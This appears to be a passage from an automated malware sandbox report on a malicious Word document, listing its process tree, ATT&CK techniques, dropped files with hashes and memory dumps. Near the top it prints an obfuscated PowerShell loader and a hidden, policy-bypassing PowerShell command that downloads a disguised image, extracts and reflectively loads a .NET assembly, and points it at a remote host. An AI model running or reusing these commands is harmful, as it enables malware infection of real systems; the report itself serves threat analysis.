㎼㈸㎩Hk﷽ ★ ㎼㈸㎩I﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩9﷽ ★ ㎼㈸㎩C﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩WwBT﷽ ★ ㎼㈸㎩Hk﷽ ★ ㎼㈸㎩cwB0﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩bQ﷽ ★ ㎼㈸㎩u﷽ ★ ㎼㈸㎩FI﷽ ★ ㎼㈸㎩ZQBm﷽ ★ ㎼㈸㎩Gw﷽ ★ ㎼㈸㎩ZQBj﷽ ★ ㎼㈸㎩HQ﷽ ★ ㎼㈸㎩aQBv﷽ ★ ㎼㈸㎩G4﷽ ★ ㎼㈸㎩LgBB﷽ ★ ㎼㈸㎩HM﷽ ★ ㎼㈸㎩cwBl﷽ ★ ㎼㈸㎩G0﷽ ★ ㎼㈸㎩YgBs﷽ ★ ㎼㈸㎩Hk﷽ ★ ㎼㈸㎩XQ﷽ ★ ㎼㈸㎩6﷽ ★ ㎼㈸㎩Do﷽ ★ ㎼㈸㎩T﷽ ★ ㎼㈸㎩Bv﷽ ★ ㎼㈸㎩GE﷽ ★ ㎼㈸㎩Z﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩o﷽ ★ ㎼㈸㎩CQ﷽ ★ ㎼㈸㎩YwBv﷽ ★ ㎼㈸㎩G0﷽ ★ ㎼㈸㎩bQBh﷽ ★ ㎼㈸㎩G4﷽ ★ ㎼㈸㎩Z﷽ ★ ㎼㈸㎩BC﷽ ★ ㎼㈸㎩Hk﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩Bl﷽ ★ ㎼㈸㎩HM﷽ ★ ㎼㈸㎩KQ﷽ ★ ㎼㈸㎩7﷽ ★ ㎼㈸㎩CQ﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩B5﷽ ★ ㎼㈸㎩H﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩ZQ﷽ ★ ㎼㈸㎩g﷽ ★ ㎼㈸㎩D0﷽ ★ ㎼㈸㎩I﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩k﷽ ★ ㎼㈸㎩Gw﷽ ★ ㎼㈸㎩bwBh﷽ ★ ㎼㈸㎩GQ﷽ ★ ㎼㈸㎩ZQBk﷽ ★ ㎼㈸㎩EE﷽ ★ ㎼㈸㎩cwBz﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩bQBi﷽ ★ ㎼㈸㎩Gw﷽ ★ ㎼㈸㎩eQ﷽ ★ ㎼㈸㎩u﷽ ★ ㎼㈸㎩Ec﷽ ★ ㎼㈸㎩ZQB0﷽ ★ ㎼㈸㎩FQ﷽ ★ ㎼㈸㎩eQBw﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩K﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩n﷽ ★ ㎼㈸㎩GQ﷽ ★ ㎼㈸㎩bgBs﷽ ★ ㎼㈸㎩Gk﷽ ★ ㎼㈸㎩Yg﷽ ★ ㎼㈸㎩u﷽ ★ ㎼㈸㎩Ek﷽ ★ ㎼㈸㎩Tw﷽ ★ ㎼㈸㎩u﷽ ★ ㎼㈸㎩Eg﷽ ★ ㎼㈸㎩bwBt﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩Jw﷽ ★ ㎼㈸㎩p﷽ ★ ㎼㈸㎩Ds﷽ ★ ㎼㈸㎩J﷽ ★ ㎼㈸㎩Bt﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩Bo﷽ ★ ㎼㈸㎩G8﷽ ★ ㎼㈸㎩Z﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩g﷽ ★ ㎼㈸㎩D0﷽ ★ ㎼㈸㎩I﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩k﷽ ★ ㎼㈸㎩HQ﷽ ★ ㎼㈸㎩eQBw﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩LgBH﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩BN﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩Bo﷽ ★ ㎼㈸㎩G8﷽ ★ ㎼㈸㎩Z﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩o﷽ ★ ㎼㈸㎩Cc﷽ ★ ㎼㈸㎩VgBB﷽ ★ ㎼㈸㎩Ek﷽ ★ ㎼㈸㎩Jw﷽ ★ ㎼㈸㎩p﷽ ★ ㎼㈸㎩C4﷽ ★ ㎼㈸㎩SQBu﷽ ★ ㎼㈸㎩HY﷽ ★ ㎼㈸㎩bwBr﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩K﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩k﷽ ★ ㎼㈸㎩G4﷽ ★ ㎼㈸㎩dQBs﷽ ★ ㎼㈸㎩Gw﷽ ★ ㎼㈸㎩L﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩g﷽ ★ ㎼㈸㎩Fs﷽ ★ ㎼㈸㎩bwBi﷽ ★ ㎼㈸㎩Go﷽ ★ ㎼㈸㎩ZQBj﷽ ★ ㎼㈸㎩HQ﷽ ★ ㎼㈸㎩WwBd﷽ ★ ㎼㈸㎩F0﷽ ★ ㎼㈸㎩I﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩o﷽ ★ ㎼㈸㎩Cc﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩B4﷽ ★ ㎼㈸㎩HQ﷽ ★ ㎼㈸㎩LgBH﷽ ★ ㎼㈸㎩FI﷽ ★ ㎼㈸㎩Vw﷽ ★ ㎼㈸㎩v﷽ ★ ㎼㈸㎩DM﷽ ★ ㎼㈸㎩N﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩x﷽ ★ ㎼㈸㎩C8﷽ ★ ㎼㈸㎩Mw﷽ ★ ㎼㈸㎩z﷽ ★ ㎼㈸㎩C4﷽ ★ ㎼㈸㎩M﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩1﷽ ★ ㎼㈸㎩DE﷽ ★ ㎼㈸㎩Lg﷽ ★ ㎼㈸㎩w﷽ ★ ㎼㈸㎩DE﷽ ★ ㎼㈸㎩Mg﷽ ★ ㎼㈸㎩u﷽ ★ ㎼㈸㎩DI﷽ ★ ㎼㈸㎩OQ﷽ ★ ㎼㈸㎩x﷽ ★ ㎼㈸㎩C8﷽ ★ ㎼㈸㎩Lw﷽ ★ ㎼㈸㎩6﷽ ★ ㎼㈸㎩H﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩B0﷽ ★ ㎼㈸㎩Gg﷽ ★ ㎼㈸㎩Jw﷽ ★ ㎼㈸㎩g﷽ ★ ㎼㈸㎩Cw﷽ ★ ㎼㈸㎩I﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩n﷽ ★ ㎼㈸㎩GQ﷽ ★ ㎼㈸㎩ZQBz﷽ ★ ㎼㈸㎩GE﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩Bp﷽ ★ ㎼㈸㎩HY﷽ ★ ㎼㈸㎩YQBk﷽ ★ ㎼㈸㎩G8﷽ ★ ㎼㈸㎩Jw﷽ ★ ㎼㈸㎩g﷽ ★ ㎼㈸㎩Cw﷽ ★ ㎼㈸㎩I﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩n﷽ ★ ㎼㈸㎩GQ﷽ ★ ㎼㈸㎩ZQBz﷽ ★ ㎼㈸㎩GE﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩Bp﷽ ★ ㎼㈸㎩HY﷽ ★ ㎼㈸㎩YQBk﷽ ★ ㎼㈸㎩G8﷽ ★ ㎼㈸㎩Jw﷽ ★ ㎼㈸㎩g﷽ ★ ㎼㈸㎩Cw﷽ ★ ㎼㈸㎩I﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩n﷽ ★ ㎼㈸㎩GQ﷽ ★ ㎼㈸㎩ZQBz﷽ ★ ㎼㈸㎩GE﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩Bp﷽ ★ ㎼㈸㎩HY﷽ ★ ㎼㈸㎩YQBk﷽ ★ ㎼㈸㎩G8﷽ ★ ㎼㈸㎩Jw﷽ ★ ㎼㈸㎩s﷽ ★ ㎼㈸㎩Cc﷽ ★ ㎼㈸㎩UgBl﷽ ★ ㎼㈸㎩Gc﷽ ★ ㎼㈸㎩QQBz﷽ ★ ㎼㈸㎩G0﷽ ★ ㎼㈸㎩Jw﷽ ★ ㎼㈸㎩s﷽ ★ ㎼㈸㎩Cc﷽ ★ ㎼㈸㎩Jw﷽ ★ ㎼㈸㎩p﷽ ★ ㎼㈸㎩Ck﷽ ★ ㎼㈸㎩';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('﷽ ★ ㎼㈸㎩','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:996
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GRW/341/33.051.012.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2540

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
1KB

MD5
4fa224d2d0de7f9d614356b87ce9a8f9

SHA1
81340c1f9243f0d7d6b4718e633eeb0a936ff3b2

SHA256
3de62a6199eec7f34c0255fb132f75448604cb47e4045c7a4c950186e6eb232d

SHA512
a6cb63403f06627ad7be7c3924b95aac7e51ad49275eafdf6ac7b5e75544b5ac033a298c07660f7f9fa65c5cc0cef282552dfd0614e2febcc605f98c982842ef

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
408B

MD5
800a840193019f22171ad5b314a4a02b

SHA1
115d21c8153836043d697cfb8a050237e07033b5

SHA256
e469a2bda91e814134e6d0f2039c5e4de54f87517f0d8b478ba160483b9e5df6

SHA512
c2a0eda66921d08240a59b34a3a310c6babe8d942c2990dc55268168816c60c5775e6848b2786d4ee18b85e99511ce1642f4fcd6d255d4d56d5ad1a926919fd3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e29320c639a18749d11d0bc5b700e336

SHA1
6555683f207c181856d55b0645b1dc3c4b910ee8

SHA256
92b32830a215ed9fe7c88e26afa4e4fc0d42dab19264fc3b79cdd82b72d6c649

SHA512
7b788ed5a327005848b80a56510aa9b1d17a292eb4d1abd8176dbf9effc93a65aabba26c2ba2fe9505d690a315fd06df9caae31039c5fc2b6547561a77139231

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{4394172E-BE3E-4A0D-9DFA-44374E865A06}.FSD

Filesize
128KB

MD5
73f27364491c105c68fc1238db7058eb

SHA1
36a1b60891ec049d1c1af371206989439b5e84fc

SHA256
766f0855bcdf3ff058cce189d221869d39eb9df9383ba370d6ef88b843fe873c

SHA512
f7c0bc15ac0d4970ee1f2f068d1a8d83e5a20eeb014ba6579cc606f8572d309146fc99b2c38ad7bc9e9d02a2f666b0626e86b9d14f32ca1a5dd2bd9d903e2446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
567b7d4f67c10379655c43f2965cd815

SHA1
3c875ea857eef19dcd9950662c3a6b36968072b7

SHA256
4257f679b35095ebf1cf137024705f8711235d60bdf871a778ae28813841cf25

SHA512
90ca9c0d66e46bfa5e65c73ac90ba3cf597b4d20396e02f9ea6b8e9dbf56814313977f6532c873f3e7c562acb322e4595c782c7952608890b815c2863bf1a410

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{118FC193-4EA9-4654-9FCD-498BBD7B631E}.FSD

Filesize
128KB

MD5
b891b4d14a6018f09f81deb1f8288ef2

SHA1
9016a58d554feb8bb47b0ef302a85da048069292

SHA256
8230ae7a441c0e20e5b4bea4a236709297597dd5bf09a1068be2ad7c75643aef

SHA512
c29ca586d74974327855bd4db2a13581154618e4875d0c8a1d1bdc0fde238dc3ef843138b978542049253b0fb9f5dd3b9934d7a30f4681002fcdceeb6a835ba3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\40WV1DY9\seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn[1].doc

Filesize
84KB

MD5
d18067e4be9ca434241869dda26c5f8f

SHA1
e3f3abcc32c87d48037d68577c3b625bb1c02636

SHA256
f34155575606c4bb730c370e184b5581e724c35fa0161da93f37e5263d476650

SHA512
1d7bf63a5235e5f9c0815ac50ead92775e1e6e1f72b3e53e3432b367f4b8504d411ac575085fea6028085b1790d780f669c80c7455ae9c6c0d89f044a3e053be

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab2FAB.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar2FCD.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\{6F45FF0F-7250-4F2B-AC84-4115F90CFA33}

Filesize
128KB

MD5
b75fedb6305c75ff70e78990990ee98f

SHA1
3514492f39d59ba0e8788830a105cafdd49d4aae

SHA256
80a7259a2921c9b64fcbe511da5e0af929b2960cdf5845cf15071febab11c5ae

SHA512
4b2c268a98a121e9b74aec762806830501005e6fab37c445512818d6190d7408d425a6e37e81424839f79cfc5f5362e8fa783960ed6c31f75b4c1ff3c08cd8ac

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
439B

MD5
0be6409583285f16cf45ecca27a60f54

SHA1
001061e8926741441afb3372fe48b3d204e60dba

SHA256
3070a10eaa4423757a3bbe8d20f5395748c79116f92ca160e6c1523b0f8d0942

SHA512
7bc4d2b988aca5f7866e6eec87c5923d78e12c6303ca98594ba2bceeadf29c117e971ce0051560042d33d3ef23ae194e76db1609f953a5a2816b8226d3cb3305

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\7FJ3XX07.txt

Filesize
72B

MD5
1abcef311efc188ad6f2dd0c8d131cfc

SHA1
d1cce55db7608e8b32fcf382dba6dfe215069e1e

SHA256
f4c7fb94e2b11e571d33861ecd6e11bf945147b170fdc5b53b700f760ea66b03

SHA512
ac82117682c156f733cb4e91920c097c79d3841e46a66093244af7a11ba42ac41c2e1e7a423fe0cf09769831b5ca224758398d125e3270dcbc6d40b422f1cd70

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
364d0454562b6ff3405a3c8a800e966f

SHA1
2e6610cceeab017cd65324aca8d678498d404916

SHA256
57057d5b785755ccbe4cde671494da82cd6939ece7f885f3e0e4f4956e4792ef

SHA512
abb7aa22fdde6c266832bb4d0531cab0206f6709f3c5fdb0d79f80d32808ad5cdae445679e9c36434d680cde914dbd335dc552de512a60f995b3c2d795ad0093

Download Submit
C:\Users\Admin\AppData\Roaming\mekissedbutterburnwithstrong.vBS

Filesize
178KB

MD5
d1e9e89d71457c35e8a8ff31eadfd642

SHA1
e2654f19ce0282bdb9fa8f4d10adacb4adfdfd87

SHA256
5471914f742d78458a2d51c614477f695e79a6ed17156b2d735b7b3bebcbe7d4

SHA512
011f62153d1252adc1a2793f014541ed8ac7b2753069fa66d809dc11afaa1b64d768383ad4b3f7c0e97605dd28b2047c00c1aea2dd8ea561026b8f4c013b73ed

Download Submit
memory/1044-56-0x0000000002F30000-0x0000000002F32000-memory.dmp

Filesize
8KB

Download
memory/1044-54-0x0000000072BED000-0x0000000072BF8000-memory.dmp

Filesize
44KB

Download
memory/1044-51-0x000000002F5B1000-0x000000002F5B2000-memory.dmp

Filesize
4KB

Download
memory/1044-156-0x0000000072BED000-0x0000000072BF8000-memory.dmp

Filesize
44KB

Download
memory/1044-170-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1044-171-0x0000000072BED000-0x0000000072BF8000-memory.dmp

Filesize
44KB

Download
memory/2008-57-0x0000000002D00000-0x0000000002D02000-memory.dmp

Filesize
8KB

Download
memory/2008-53-0x0000000072BED000-0x0000000072BF8000-memory.dmp

Filesize
44KB

Download
memory/2008-1-0x0000000072BED000-0x0000000072BF8000-memory.dmp

Filesize
44KB

Download
memory/2008-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download